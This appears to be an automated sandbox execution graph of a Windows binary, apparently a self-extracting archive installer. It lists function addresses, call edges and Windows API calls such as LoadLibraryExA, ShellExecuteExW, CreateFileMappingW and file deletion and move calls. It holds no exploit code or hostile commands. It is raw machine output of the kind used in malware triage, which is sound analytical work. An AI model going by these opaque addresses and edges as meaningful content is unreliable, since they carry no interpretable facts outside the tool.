                                                    execution_graph 23475 d0e1d1 14 API calls ___delayLoadHelper2@8 25431 d1a3d0 21 API calls 2 library calls 25432 d22bd0 VariantClear 25382 d0f4d3 20 API calls 23477 d0e2d7 23478 d0e1db 23477->23478 23480 d0e85d 23478->23480 23506 d0e5bb 23480->23506 23482 d0e86d 23483 d0e8ca 23482->23483 23493 d0e8ee 23482->23493 23484 d0e7fb DloadReleaseSectionWriteAccess 6 API calls 23483->23484 23485 d0e8d5 RaiseException 23484->23485 23502 d0eac3 23485->23502 23486 d0e966 LoadLibraryExA 23487 d0e9c7 23486->23487 23488 d0e979 GetLastError 23486->23488 23492 d0e9d2 FreeLibrary 23487->23492 23494 d0e9d9 23487->23494 23489 d0e9a2 23488->23489 23497 d0e98c 23488->23497 23495 d0e7fb DloadReleaseSectionWriteAccess 6 API calls 23489->23495 23490 d0ea37 GetProcAddress 23491 d0ea95 23490->23491 23496 d0ea47 GetLastError 23490->23496 23515 d0e7fb 23491->23515 23492->23494 23493->23486 23493->23487 23493->23491 23493->23494 23494->23490 23494->23491 23498 d0e9ad RaiseException 23495->23498 23499 d0ea5a 23496->23499 23497->23487 23497->23489 23498->23502 23499->23491 23501 d0e7fb DloadReleaseSectionWriteAccess 6 API calls 23499->23501 23503 d0ea7b RaiseException 23501->23503 23502->23478 23504 d0e5bb ___delayLoadHelper2@8 6 API calls 23503->23504 23505 d0ea92 23504->23505 23505->23491 23507 d0e5c7 23506->23507 23508 d0e5ed 23506->23508 23523 d0e664 23507->23523 23508->23482 23510 d0e5cc 23511 d0e5e8 23510->23511 23526 d0e78d 23510->23526 23531 d0e5ee GetModuleHandleW GetProcAddress GetProcAddress 23511->23531 23514 d0e836 23514->23482 23516 d0e80d 23515->23516 23517 d0e82f 23515->23517 23518 d0e664 DloadReleaseSectionWriteAccess 3 API calls 23516->23518 23517->23502 23519 d0e812 23518->23519 23520 d0e82a 23519->23520 23521 d0e78d DloadProtectSection 3 API calls 23519->23521 23534 d0e831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 23520->23534 23521->23520 23532 d0e5ee GetModuleHandleW GetProcAddress GetProcAddress 23523->23532 23525 d0e669 23525->23510 23528 d0e7a2 DloadProtectSection 23526->23528 23527 d0e7a8 23527->23511 23528->23527 23529 d0e7dd VirtualProtect 23528->23529 23533 d0e6a3 VirtualQuery GetSystemInfo 23528->23533 23529->23527 23531->23514 23532->23525 23533->23529 23534->23517 25383 d10ada 51 API calls 2 library calls 25434 d0b5c0 100 API calls 25435 d077c0 118 API calls 25436 d0ffc0 RaiseException _com_error::_com_error CallUnexpected 23727 d0dec2 23728 d0decf 23727->23728 23735 cfe617 23728->23735 23731 cf4092 _swprintf 51 API calls 23732 d0def1 SetDlgItemTextW 23731->23732 23739 d0b568 PeekMessageW 23732->23739 23736 cfe627 23735->23736 23744 cfe648 23736->23744 23740 d0b583 GetMessageW 23739->23740 23741 d0b5bc 23739->23741 23742 d0b5a8 TranslateMessage DispatchMessageW 23740->23742 23743 d0b599 IsDialogMessageW 23740->23743 23742->23741 23743->23741 23743->23742 23750 cfd9b0 23744->23750 23747 cfe66b LoadStringW 23748 cfe645 23747->23748 23749 cfe682 LoadStringW 23747->23749 23748->23731 23749->23748 23755 cfd8ec 23750->23755 23752 cfd9cd 23753 cfd9e2 23752->23753 23763 cfd9f0 26 API calls 23752->23763 23753->23747 23753->23748 23756 cfd904 23755->23756 23762 cfd984 _strncpy 23755->23762 23758 cfd928 23756->23758 23764 d01da7 WideCharToMultiByte 23756->23764 23761 cfd959 23758->23761 23765 cfe5b1 50 API calls __vsnprintf 23758->23765 23766 d16159 26 API calls 3 library calls 23761->23766 23762->23752 23763->23753 23764->23758 23765->23761 23766->23762 23771 cf10d5 23776 cf5abd 23771->23776 23777 cf5ac7 __EH_prolog 23776->23777 23783 cfb505 23777->23783 23779 cf5ad3 23789 cf5cac GetCurrentProcess GetProcessAffinityMask 23779->23789 23784 cfb50f __EH_prolog 23783->23784 23790 cff1d0 82 API calls 23784->23790 23786 cfb521 23791 cfb61e 23786->23791 23790->23786 23792 cfb630 __cftof 23791->23792 23795 d010dc 23792->23795 23798 d0109e GetCurrentProcess GetProcessAffinityMask 23795->23798 23799 cfb597 23798->23799 23799->23779 25384 d062ca 123 API calls __InternalCxxFrameHandler 23804 d198f0 23812 d1adaf 23804->23812 23807 d19904 23809 d1990c 23810 d19919 23809->23810 23820 d19920 11 API calls 23809->23820 23821 d1ac98 23812->23821 23815 d1adee TlsAlloc 23816 d1addf 23815->23816 23817 d0fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23816->23817 23818 d198fa 23817->23818 23818->23807 23819 d19869 20 API calls 2 library calls 23818->23819 23819->23809 23820->23807 23822 d1acc8 23821->23822 23825 d1acc4 23821->23825 23822->23815 23822->23816 23823 d1ace8 23823->23822 23826 d1acf4 GetProcAddress 23823->23826 23825->23822 23825->23823 23828 d1ad34 23825->23828 23827 d1ad04 _abort 23826->23827 23827->23822 23829 d1ad55 LoadLibraryExW 23828->23829 23834 d1ad4a 23828->23834 23830 d1ad72 GetLastError 23829->23830 23831 d1ad8a 23829->23831 23830->23831 23832 d1ad7d LoadLibraryExW 23830->23832 23833 d1ada1 FreeLibrary 23831->23833 23831->23834 23832->23831 23833->23834 23834->23825 23835 d1abf0 23836 d1abfb 23835->23836 23838 d1ac24 23836->23838 23839 d1ac20 23836->23839 23841 d1af0a 23836->23841 23848 d1ac50 DeleteCriticalSection 23838->23848 23842 d1ac98 _abort 5 API calls 23841->23842 23843 d1af31 23842->23843 23844 d1af3a 23843->23844 23845 d1af4f InitializeCriticalSectionAndSpinCount 23843->23845 23846 d0fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23844->23846 23845->23844 23847 d1af66 23846->23847 23847->23836 23848->23839 25387 d188f0 7 API calls ___scrt_uninitialize_crt 25439 d0fd4f 9 API calls 2 library calls 25440 cff1e8 FreeLibrary 25388 d12cfb 38 API calls 4 library calls 23852 cf13e1 84 API calls 2 library calls 23853 d0b7e0 23854 d0b7ea __EH_prolog 23853->23854 24021 cf1316 23854->24021 23857 d0b82a 23860 d0b838 23857->23860 23861 d0b89b 23857->23861 23936 d0b841 23857->23936 23858 d0bf0f 24093 d0d69e 23858->24093 23866 d0b878 23860->23866 23867 d0b83c 23860->23867 23865 d0b92e GetDlgItemTextW 23861->23865 23871 d0b8b1 23861->23871 23863 d0bf38 23868 d0bf41 SendDlgItemMessageW 23863->23868 23869 d0bf52 GetDlgItem SendMessageW 23863->23869 23864 d0bf2a SendMessageW 23864->23863 23865->23866 23870 d0b96b 23865->23870 23874 d0b95f KiUserCallbackDispatcher 23866->23874 23866->23936 23872 cfe617 53 API calls 23867->23872 23867->23936 23868->23869 24111 d0a64d GetCurrentDirectoryW 23869->24111 23875 d0b980 GetDlgItem 23870->23875 24019 d0b974 23870->24019 23876 cfe617 53 API calls 23871->23876 23877 d0b85b 23872->23877 23874->23936 23879 d0b994 SendMessageW SendMessageW 23875->23879 23880 d0b9b7 SetFocus 23875->23880 23881 d0b8ce SetDlgItemTextW 23876->23881 24133 cf124f SHGetMalloc 23877->24133 23878 d0bf82 GetDlgItem 23883 d0bfa5 SetWindowTextW 23878->23883 23884 d0bf9f 23878->23884 23879->23880 23885 d0b9c7 23880->23885 23897 d0b9e0 23880->23897 23886 d0b8d9 23881->23886 24112 d0abab GetClassNameW 23883->24112 23884->23883 23889 cfe617 53 API calls 23885->23889 23893 d0b8e6 GetMessageW 23886->23893 23886->23936 23887 d0be55 23891 cfe617 53 API calls 23887->23891 23890 d0b9d1 23889->23890 24134 d0d4d4 23890->24134 23898 d0be65 SetDlgItemTextW 23891->23898 23894 d0b8fd IsDialogMessageW 23893->23894 23893->23936 23894->23886 23900 d0b90c TranslateMessage DispatchMessageW 23894->23900 23896 d0c1fc SetDlgItemTextW 23896->23936 23903 cfe617 53 API calls 23897->23903 23901 d0be79 23898->23901 23900->23886 23905 cfe617 53 API calls 23901->23905 23904 d0ba17 23903->23904 23909 cf4092 _swprintf 51 API calls 23904->23909 23938 d0be9c _wcslen 23905->23938 23906 d0bff0 23908 d0c020 23906->23908 23913 cfe617 53 API calls 23906->23913 23918 d0c73f 97 API calls 23908->23918 23972 d0c0d8 23908->23972 23914 d0ba29 23909->23914 23910 d0b9d9 24031 cfa0b1 23910->24031 23911 d0c73f 97 API calls 23911->23906 23917 d0c003 SetDlgItemTextW 23913->23917 23920 d0d4d4 16 API calls 23914->23920 23915 d0ba68 GetLastError 23916 d0ba73 23915->23916 24037 d0ac04 SetCurrentDirectoryW 23916->24037 23922 cfe617 53 API calls 23917->23922 23924 d0c03b 23918->23924 23919 d0c18b 23925 d0c194 EnableWindow 23919->23925 23926 d0c19d 23919->23926 23920->23910 23921 d0beed 23930 cfe617 53 API calls 23921->23930 23928 d0c017 SetDlgItemTextW 23922->23928 23937 d0c04d 23924->23937 23963 d0c072 23924->23963 23925->23926 23927 d0c1ba 23926->23927 24152 cf12d3 GetDlgItem EnableWindow 23926->24152 23933 d0c1e1 23927->23933 23948 d0c1d9 SendMessageW 23927->23948 23928->23908 23929 d0ba87 23934 d0ba90 GetLastError 23929->23934 23935 d0ba9e 23929->23935 23930->23936 23931 d0c0cb 23940 d0c73f 97 API calls 23931->23940 23933->23936 23949 cfe617 53 API calls 23933->23949 23934->23935 23941 d0bb11 23935->23941 23944 d0bb20 23935->23944 23950 d0baae GetTickCount 23935->23950 24150 d09ed5 32 API calls 23937->24150 23938->23921 23943 cfe617 53 API calls 23938->23943 23939 d0c1b0 24153 cf12d3 GetDlgItem EnableWindow 23939->24153 23940->23972 23941->23944 23945 d0bd56 23941->23945 23951 d0bed0 23943->23951 23953 d0bcfb 23944->23953 23954 d0bcf1 23944->23954 23955 d0bb39 GetModuleFileNameW 23944->23955 24053 cf12f1 GetDlgItem ShowWindow 23945->24053 23946 d0c066 23946->23963 23948->23933 23957 d0b862 23949->23957 23958 cf4092 _swprintf 51 API calls 23950->23958 23959 cf4092 _swprintf 51 API calls 23951->23959 23952 d0c169 24151 d09ed5 32 API calls 23952->24151 23962 cfe617 53 API calls 23953->23962 23954->23866 23954->23953 24144 cff28c 82 API calls 23955->24144 23957->23896 23957->23936 23965 d0bac7 23958->23965 23959->23921 23969 d0bd05 23962->23969 23963->23931 23970 d0c73f 97 API calls 23963->23970 23964 d0bd66 24054 cf12f1 GetDlgItem ShowWindow 23964->24054 24038 cf966e 23965->24038 23966 cfe617 53 API calls 23966->23972 23967 d0c188 23967->23919 23968 d0bb5f 23973 cf4092 _swprintf 51 API calls 23968->23973 23974 cf4092 _swprintf 51 API calls 23969->23974 23975 d0c0a0 23970->23975 23972->23919 23972->23952 23972->23966 23978 d0bb81 CreateFileMappingW 23973->23978 23979 d0bd23 23974->23979 23975->23931 23980 d0c0a9 DialogBoxParamW 23975->23980 23976 d0bd70 23981 cfe617 53 API calls 23976->23981 23984 d0bbe3 GetCommandLineW 23978->23984 24015 d0bc60 __InternalCxxFrameHandler 23978->24015 23993 cfe617 53 API calls 23979->23993 23980->23866 23980->23931 23982 d0bd7a SetDlgItemTextW 23981->23982 24055 cf12f1 GetDlgItem ShowWindow 23982->24055 23983 d0baed 23987 d0baff 23983->23987 23988 d0baf4 GetLastError 23983->23988 23989 d0bbf4 23984->23989 23985 d0bc6b ShellExecuteExW 24010 d0bc88 23985->24010 24046 cf959a 23987->24046 23988->23987 24145 d0b425 SHGetMalloc 23989->24145 23990 d0bd8c SetDlgItemTextW GetDlgItem 23994 d0bdc1 23990->23994 23995 d0bda9 GetWindowLongW SetWindowLongW 23990->23995 23997 d0bd3d 23993->23997 24056 d0c73f 23994->24056 23995->23994 23996 d0bc10 24146 d0b425 SHGetMalloc 23996->24146 24001 d0bc1c 24147 d0b425 SHGetMalloc 24001->24147 24002 d0bccb 24002->23954 24008 d0bce1 UnmapViewOfFile CloseHandle 24002->24008 24003 d0c73f 97 API calls 24005 d0bddd 24003->24005 24081 d0da52 24005->24081 24006 d0bc28 24148 cff3fa 82 API calls 2 library calls 24006->24148 24008->23954 24010->24002 24013 d0bcb7 Sleep 24010->24013 24012 d0bc3f MapViewOfFile 24012->24015 24013->24002 24013->24010 24014 d0c73f 97 API calls 24018 d0be03 24014->24018 24015->23985 24016 d0be2c 24149 cf12d3 GetDlgItem EnableWindow 24016->24149 24018->24016 24020 d0c73f 97 API calls 24018->24020 24019->23866 24019->23887 24020->24016 24022 cf131f 24021->24022 24023 cf1378 24021->24023 24024 cf1385 24022->24024 24154 cfe2e8 62 API calls 2 library calls 24022->24154 24155 cfe2c1 GetWindowLongW SetWindowLongW 24023->24155 24024->23857 24024->23858 24024->23936 24027 cf1341 24027->24024 24028 cf1354 GetDlgItem 24027->24028 24028->24024 24029 cf1364 24028->24029 24029->24024 24030 cf136a SetWindowTextW 24029->24030 24030->24024 24033 cfa0bb 24031->24033 24032 cfa14c 24034 cfa2b2 8 API calls 24032->24034 24036 cfa175 24032->24036 24033->24032 24033->24036 24156 cfa2b2 24033->24156 24034->24036 24036->23915 24036->23916 24037->23929 24039 cf9678 24038->24039 24040 cf96d5 CreateFileW 24039->24040 24041 cf96c9 24039->24041 24040->24041 24042 cf971f 24041->24042 24043 cfbb03 GetCurrentDirectoryW 24041->24043 24042->23983 24044 cf9704 24043->24044 24044->24042 24045 cf9708 CreateFileW 24044->24045 24045->24042 24047 cf95be 24046->24047 24052 cf95cf 24046->24052 24048 cf95ca 24047->24048 24049 cf95d1 24047->24049 24047->24052 24177 cf974e 24048->24177 24182 cf9620 24049->24182 24052->23941 24053->23964 24054->23976 24055->23990 24057 d0c749 __EH_prolog 24056->24057 24058 d0bdcf 24057->24058 24059 d0b314 ExpandEnvironmentStringsW 24057->24059 24058->24003 24071 d0c780 _wcslen _wcsrchr 24059->24071 24061 d0b314 ExpandEnvironmentStringsW 24061->24071 24062 d0ca67 SetWindowTextW 24062->24071 24065 d13e3e 22 API calls 24065->24071 24067 d0c855 SetFileAttributesW 24068 d0c90f GetFileAttributesW 24067->24068 24069 d0c86f __cftof _wcslen 24067->24069 24068->24071 24072 d0c921 DeleteFileW 24068->24072 24069->24068 24069->24071 24199 cfb991 51 API calls 2 library calls 24069->24199 24071->24058 24071->24061 24071->24062 24071->24065 24071->24067 24074 d0cc31 GetDlgItem SetWindowTextW SendMessageW 24071->24074 24076 d0cc71 SendMessageW 24071->24076 24197 d01fbb CompareStringW 24071->24197 24198 d0a64d GetCurrentDirectoryW 24071->24198 24200 cfa5d1 6 API calls 24071->24200 24201 cfa55a FindClose 24071->24201 24202 d0b48e 76 API calls 2 library calls 24071->24202 24072->24071 24078 d0c932 24072->24078 24074->24071 24075 cf4092 _swprintf 51 API calls 24077 d0c952 GetFileAttributesW 24075->24077 24076->24071 24077->24078 24079 d0c967 MoveFileW 24077->24079 24078->24075 24079->24071 24080 d0c97f MoveFileExW 24079->24080 24080->24071 24082 d0da5c __EH_prolog 24081->24082 24203 d00659 24082->24203 24084 d0da8d 24207 cf5b3d 24084->24207 24086 d0daab 24211 cf7b0d 24086->24211 24090 d0dafe 24227 cf7b9e 24090->24227 24092 d0bdee 24092->24014 24094 d0d6a8 24093->24094 24705 d0a5c6 24094->24705 24097 d0d6b5 GetWindow 24098 d0d6d5 24097->24098 24099 d0bf15 24097->24099 24098->24099 24100 d0d6e2 GetClassNameW 24098->24100 24102 d0d706 GetWindowLongW 24098->24102 24103 d0d76a GetWindow 24098->24103 24099->23863 24099->23864 24710 d01fbb CompareStringW 24100->24710 24102->24103 24104 d0d716 SendMessageW 24102->24104 24103->24098 24103->24099 24104->24103 24105 d0d72c GetObjectW 24104->24105 24711 d0a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24105->24711 24107 d0d743 24712 d0a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24107->24712 24713 d0a80c 8 API calls 24107->24713 24110 d0d754 SendMessageW DeleteObject 24110->24103 24111->23878 24113 d0abf1 24112->24113 24114 d0abcc 24112->24114 24115 d0abf6 SHAutoComplete 24113->24115 24116 d0abff 24113->24116 24716 d01fbb CompareStringW 24114->24716 24115->24116 24120 d0b093 24116->24120 24118 d0abdf 24118->24113 24119 d0abe3 FindWindowExW 24118->24119 24119->24113 24121 d0b09d __EH_prolog 24120->24121 24122 cf13dc 84 API calls 24121->24122 24123 d0b0bf 24122->24123 24717 cf1fdc 24123->24717 24126 d0b0d9 24128 cf1692 86 API calls 24126->24128 24127 d0b0eb 24129 cf19af 128 API calls 24127->24129 24130 d0b0e4 24128->24130 24132 d0b10d __InternalCxxFrameHandler ___std_exception_copy 24129->24132 24130->23906 24130->23911 24131 cf1692 86 API calls 24131->24130 24132->24131 24133->23957 24135 d0b568 5 API calls 24134->24135 24136 d0d4e0 GetDlgItem 24135->24136 24137 d0d502 24136->24137 24138 d0d536 SendMessageW SendMessageW 24136->24138 24141 d0d50d ShowWindow SendMessageW SendMessageW 24137->24141 24139 d0d591 SendMessageW SendMessageW SendMessageW 24138->24139 24140 d0d572 24138->24140 24142 d0d5c4 SendMessageW 24139->24142 24143 d0d5e7 SendMessageW 24139->24143 24140->24139 24141->24138 24142->24143 24143->23910 24144->23968 24145->23996 24146->24001 24147->24006 24148->24012 24149->24019 24150->23946 24151->23967 24152->23939 24153->23927 24154->24027 24155->24024 24157 cfa2bf 24156->24157 24158 cfa2e3 24157->24158 24159 cfa2d6 CreateDirectoryW 24157->24159 24160 cfa231 3 API calls 24158->24160 24159->24158 24161 cfa316 24159->24161 24162 cfa2e9 24160->24162 24164 cfa325 24161->24164 24169 cfa4ed 24161->24169 24163 cfa329 GetLastError 24162->24163 24166 cfbb03 GetCurrentDirectoryW 24162->24166 24163->24164 24164->24033 24167 cfa2ff 24166->24167 24167->24163 24168 cfa303 CreateDirectoryW 24167->24168 24168->24161 24168->24163 24170 d0ec50 24169->24170 24171 cfa4fa SetFileAttributesW 24170->24171 24172 cfa53d 24171->24172 24173 cfa510 24171->24173 24172->24164 24174 cfbb03 GetCurrentDirectoryW 24173->24174 24175 cfa524 24174->24175 24175->24172 24176 cfa528 SetFileAttributesW 24175->24176 24176->24172 24178 cf9757 24177->24178 24179 cf9781 24177->24179 24178->24179 24188 cfa1e0 24178->24188 24179->24052 24183 cf962c 24182->24183 24185 cf964a 24182->24185 24183->24185 24186 cf9638 CloseHandle 24183->24186 24184 cf9669 24184->24052 24185->24184 24196 cf6bd5 76 API calls 24185->24196 24186->24185 24189 d0ec50 24188->24189 24190 cfa1ed DeleteFileW 24189->24190 24191 cf977f 24190->24191 24192 cfa200 24190->24192 24191->24052 24193 cfbb03 GetCurrentDirectoryW 24192->24193 24194 cfa214 24193->24194 24194->24191 24195 cfa218 DeleteFileW 24194->24195 24195->24191 24196->24184 24197->24071 24198->24071 24199->24069 24200->24071 24201->24071 24202->24071 24204 d00666 _wcslen 24203->24204 24231 cf17e9 24204->24231 24206 d0067e 24206->24084 24208 d00659 _wcslen 24207->24208 24209 cf17e9 78 API calls 24208->24209 24210 d0067e 24209->24210 24210->24086 24212 cf7b17 __EH_prolog 24211->24212 24248 cfce40 24212->24248 24214 cf7b32 24254 d0eb38 24214->24254 24216 cf7b5c 24263 d04a76 24216->24263 24219 cf7c7d 24220 cf7c87 24219->24220 24221 cf7cf1 24220->24221 24295 cfa56d 24220->24295 24225 cf7d50 24221->24225 24273 cf8284 24221->24273 24223 cf7d92 24223->24090 24225->24223 24301 cf138b 74 API calls 24225->24301 24228 cf7bac 24227->24228 24229 cf7bb3 24227->24229 24230 d02297 86 API calls 24228->24230 24230->24229 24232 cf17ff 24231->24232 24241 cf185a __InternalCxxFrameHandler 24231->24241 24233 cf1828 24232->24233 24244 cf6c36 76 API calls __vswprintf_c_l 24232->24244 24235 cf1887 24233->24235 24240 cf1847 ___std_exception_copy 24233->24240 24237 d13e3e 22 API calls 24235->24237 24236 cf181e 24245 cf6ca7 75 API calls 24236->24245 24239 cf188e 24237->24239 24239->24241 24247 cf6ca7 75 API calls 24239->24247 24240->24241 24246 cf6ca7 75 API calls 24240->24246 24241->24206 24244->24236 24245->24233 24246->24241 24247->24241 24249 cfce4a __EH_prolog 24248->24249 24250 d0eb38 8 API calls 24249->24250 24252 cfce8d 24250->24252 24251 d0eb38 8 API calls 24253 cfceb1 24251->24253 24252->24251 24253->24214 24256 d0eb3d ___std_exception_copy 24254->24256 24255 d0eb57 24255->24216 24256->24255 24259 d0eb59 24256->24259 24269 d17a5e 7 API calls 2 library calls 24256->24269 24258 d0f5c9 24271 d1238d RaiseException 24258->24271 24259->24258 24270 d1238d RaiseException 24259->24270 24261 d0f5e6 24264 d04a80 __EH_prolog 24263->24264 24265 d0eb38 8 API calls 24264->24265 24266 d04a9c 24265->24266 24267 cf7b8b 24266->24267 24272 d00e46 80 API calls 24266->24272 24267->24219 24269->24256 24270->24258 24271->24261 24272->24267 24274 cf828e __EH_prolog 24273->24274 24302 cf13dc 24274->24302 24276 cf82aa 24277 cf82bb 24276->24277 24442 cf9f42 24276->24442 24280 cf82f2 24277->24280 24310 cf1a04 24277->24310 24438 cf1692 24280->24438 24283 cf82ee 24283->24280 24291 cfa56d 7 API calls 24283->24291 24293 cf8389 24283->24293 24446 cfc0c5 CompareStringW _wcslen 24283->24446 24287 cf83e8 24334 cf1f6d 24287->24334 24291->24283 24292 cf83f3 24292->24280 24338 cf3b2d 24292->24338 24350 cf848e 24292->24350 24329 cf8430 24293->24329 24297 cfa582 24295->24297 24296 cfa5b0 24296->24220 24297->24296 24694 cfa69b 24297->24694 24299 cfa592 24299->24296 24300 cfa597 FindClose 24299->24300 24300->24296 24301->24223 24303 cf13e1 __EH_prolog 24302->24303 24304 cfce40 8 API calls 24303->24304 24305 cf1419 24304->24305 24306 d0eb38 8 API calls 24305->24306 24309 cf1474 __cftof 24305->24309 24307 cf1461 24306->24307 24308 cfb505 84 API calls 24307->24308 24307->24309 24308->24309 24309->24276 24311 cf1a0e __EH_prolog 24310->24311 24323 cf1a61 24311->24323 24325 cf1b9b 24311->24325 24448 cf13ba 24311->24448 24313 cf1bc7 24460 cf138b 74 API calls 24313->24460 24316 cf3b2d 101 API calls 24319 cf1c12 24316->24319 24317 cf1bd4 24317->24316 24317->24325 24318 cf1c5a 24322 cf1c8d 24318->24322 24318->24325 24461 cf138b 74 API calls 24318->24461 24319->24318 24321 cf3b2d 101 API calls 24319->24321 24321->24319 24322->24325 24327 cf9e80 79 API calls 24322->24327 24323->24313 24323->24317 24323->24325 24324 cf3b2d 101 API calls 24326 cf1cde 24324->24326 24325->24283 24326->24324 24326->24325 24327->24326 24481 cfcf3d 24329->24481 24331 cf8440 24485 d013d2 GetSystemTime SystemTimeToFileTime 24331->24485 24333 cf83a3 24333->24287 24447 d01b66 72 API calls 24333->24447 24335 cf1f72 __EH_prolog 24334->24335 24337 cf1fa6 24335->24337 24490 cf19af 24335->24490 24337->24292 24339 cf3b39 24338->24339 24340 cf3b3d 24338->24340 24339->24292 24349 cf9e80 79 API calls 24340->24349 24341 cf3b4f 24342 cf3b6a 24341->24342 24343 cf3b78 24341->24343 24344 cf3baa 24342->24344 24620 cf32f7 89 API calls 2 library calls 24342->24620 24621 cf286b 101 API calls 3 library calls 24343->24621 24344->24292 24347 cf3b76 24347->24344 24622 cf20d7 74 API calls 24347->24622 24349->24341 24351 cf8498 __EH_prolog 24350->24351 24354 cf84d5 24351->24354 24365 cf8513 24351->24365 24647 d08c8d 103 API calls 24351->24647 24353 cf84f5 24355 cf851c 24353->24355 24356 cf84fa 24353->24356 24354->24353 24359 cf857a 24354->24359 24354->24365 24355->24365 24649 d08c8d 103 API calls 24355->24649 24356->24365 24648 cf7a0d 152 API calls 24356->24648 24359->24365 24623 cf5d1a 24359->24623 24361 cf8605 24361->24365 24629 cf8167 24361->24629 24364 cf8797 24366 cfa56d 7 API calls 24364->24366 24369 cf8802 24364->24369 24365->24292 24366->24369 24368 cfd051 82 API calls 24375 cf885d 24368->24375 24635 cf7c0d 24369->24635 24370 cf898b 24652 cf2021 74 API calls 24370->24652 24371 cf8a5f 24378 cf8ab6 24371->24378 24386 cf8a6a 24371->24386 24372 cf8992 24372->24371 24379 cf89e1 24372->24379 24375->24365 24375->24368 24375->24370 24375->24372 24650 cf8117 84 API calls 24375->24650 24651 cf2021 74 API calls 24375->24651 24376 cf8b14 24382 cf8b82 24376->24382 24426 cf9105 24376->24426 24656 cf98bc 24376->24656 24377 cf8a4c 24377->24376 24385 cf8ab4 24377->24385 24378->24377 24655 cf7fc0 97 API calls 24378->24655 24379->24376 24379->24377 24381 cfa231 3 API calls 24379->24381 24380 cf959a 80 API calls 24380->24365 24388 cf8a19 24381->24388 24387 cfab1a 8 API calls 24382->24387 24384 cf959a 80 API calls 24384->24365 24385->24380 24386->24385 24654 cf7db2 101 API calls 24386->24654 24390 cf8bd1 24387->24390 24388->24377 24653 cf92a3 97 API calls 24388->24653 24393 cfab1a 8 API calls 24390->24393 24406 cf8be7 24393->24406 24396 cf8b70 24660 cf6e98 77 API calls 24396->24660 24398 cf8cbc 24399 cf8d18 24398->24399 24400 cf8e40 24398->24400 24401 cf8d8a 24399->24401 24402 cf8d28 24399->24402 24403 cf8e66 24400->24403 24404 cf8e52 24400->24404 24423 cf8d49 24400->24423 24411 cf8167 19 API calls 24401->24411 24407 cf8d6e 24402->24407 24415 cf8d37 24402->24415 24405 d03377 75 API calls 24403->24405 24408 cf9215 123 API calls 24404->24408 24409 cf8e7f 24405->24409 24406->24398 24410 cf8c93 24406->24410 24417 cf981a 79 API calls 24406->24417 24407->24423 24663 cf77b8 111 API calls 24407->24663 24408->24423 24666 d03020 123 API calls 24409->24666 24410->24398 24661 cf9a3c 82 API calls 24410->24661 24414 cf8dbd 24411->24414 24419 cf8de6 24414->24419 24420 cf8df5 24414->24420 24414->24423 24662 cf2021 74 API calls 24415->24662 24417->24410 24664 cf7542 85 API calls 24419->24664 24665 cf9155 93 API calls __EH_prolog 24420->24665 24429 cf8f85 24423->24429 24667 cf2021 74 API calls 24423->24667 24425 cf9090 24425->24426 24428 cfa4ed 3 API calls 24425->24428 24426->24384 24427 cf903e 24642 cf9da2 24427->24642 24430 cf90eb 24428->24430 24429->24425 24429->24426 24429->24427 24641 cf9f09 SetEndOfFile 24429->24641 24430->24426 24668 cf2021 74 API calls 24430->24668 24433 cf9085 24435 cf9620 77 API calls 24433->24435 24435->24425 24436 cf90fb 24669 cf6dcb 76 API calls 24436->24669 24439 cf16a4 24438->24439 24685 cfcee1 24439->24685 24443 cf9f59 24442->24443 24445 cf9f63 24443->24445 24693 cf6d0c 78 API calls 24443->24693 24445->24277 24446->24283 24447->24287 24462 cf1732 24448->24462 24450 cf13d6 24451 cf9e80 24450->24451 24452 cf9ea5 24451->24452 24453 cf9e92 24451->24453 24454 cf9eb0 24452->24454 24455 cf9eb8 SetFilePointer 24452->24455 24453->24454 24479 cf6d5b 77 API calls 24453->24479 24454->24323 24455->24454 24457 cf9ed4 GetLastError 24455->24457 24457->24454 24458 cf9ede 24457->24458 24458->24454 24480 cf6d5b 77 API calls 24458->24480 24460->24325 24461->24322 24463 cf1748 24462->24463 24474 cf17a0 __InternalCxxFrameHandler 24462->24474 24464 cf1771 24463->24464 24475 cf6c36 76 API calls __vswprintf_c_l 24463->24475 24466 cf17c7 24464->24466 24470 cf178d ___std_exception_copy 24464->24470 24468 d13e3e 22 API calls 24466->24468 24467 cf1767 24476 cf6ca7 75 API calls 24467->24476 24471 cf17ce 24468->24471 24470->24474 24477 cf6ca7 75 API calls 24470->24477 24471->24474 24478 cf6ca7 75 API calls 24471->24478 24474->24450 24475->24467 24476->24464 24477->24474 24478->24474 24479->24452 24480->24454 24482 cfcf4d 24481->24482 24484 cfcf54 24481->24484 24486 cf981a 24482->24486 24484->24331 24485->24333 24487 cf9833 24486->24487 24489 cf9e80 79 API calls 24487->24489 24488 cf9865 24488->24484 24489->24488 24491 cf19bf 24490->24491 24493 cf19bb 24490->24493 24494 cf18f6 24491->24494 24493->24337 24495 cf1908 24494->24495 24496 cf1945 24494->24496 24497 cf3b2d 101 API calls 24495->24497 24502 cf3fa3 24496->24502 24498 cf1928 24497->24498 24498->24493 24505 cf3fac 24502->24505 24503 cf3b2d 101 API calls 24503->24505 24505->24503 24506 cf1966 24505->24506 24519 d00e08 24505->24519 24506->24498 24507 cf1e50 24506->24507 24508 cf1e5a __EH_prolog 24507->24508 24527 cf3bba 24508->24527 24510 cf1e84 24511 cf1732 78 API calls 24510->24511 24513 cf1f0b 24510->24513 24512 cf1e9b 24511->24512 24555 cf18a9 78 API calls 24512->24555 24513->24498 24515 cf1eb3 24517 cf1ebf _wcslen 24515->24517 24556 d01b84 MultiByteToWideChar 24515->24556 24557 cf18a9 78 API calls 24517->24557 24520 d00e0f 24519->24520 24521 d00e2a 24520->24521 24525 cf6c31 RaiseException CallUnexpected 24520->24525 24523 d00e3b SetThreadExecutionState 24521->24523 24526 cf6c31 RaiseException CallUnexpected 24521->24526 24523->24505 24525->24521 24526->24523 24528 cf3bc4 __EH_prolog 24527->24528 24529 cf3bda 24528->24529 24530 cf3bf6 24528->24530 24583 cf138b 74 API calls 24529->24583 24532 cf3e51 24530->24532 24535 cf3c22 24530->24535 24600 cf138b 74 API calls 24532->24600 24534 cf3be5 24534->24510 24535->24534 24558 d03377 24535->24558 24537 cf3ca3 24538 cf3d2e 24537->24538 24554 cf3c9a 24537->24554 24586 cfd051 24537->24586 24568 cfab1a 24538->24568 24539 cf3c9f 24539->24537 24585 cf20bd 78 API calls 24539->24585 24541 cf3c8f 24584 cf138b 74 API calls 24541->24584 24542 cf3c71 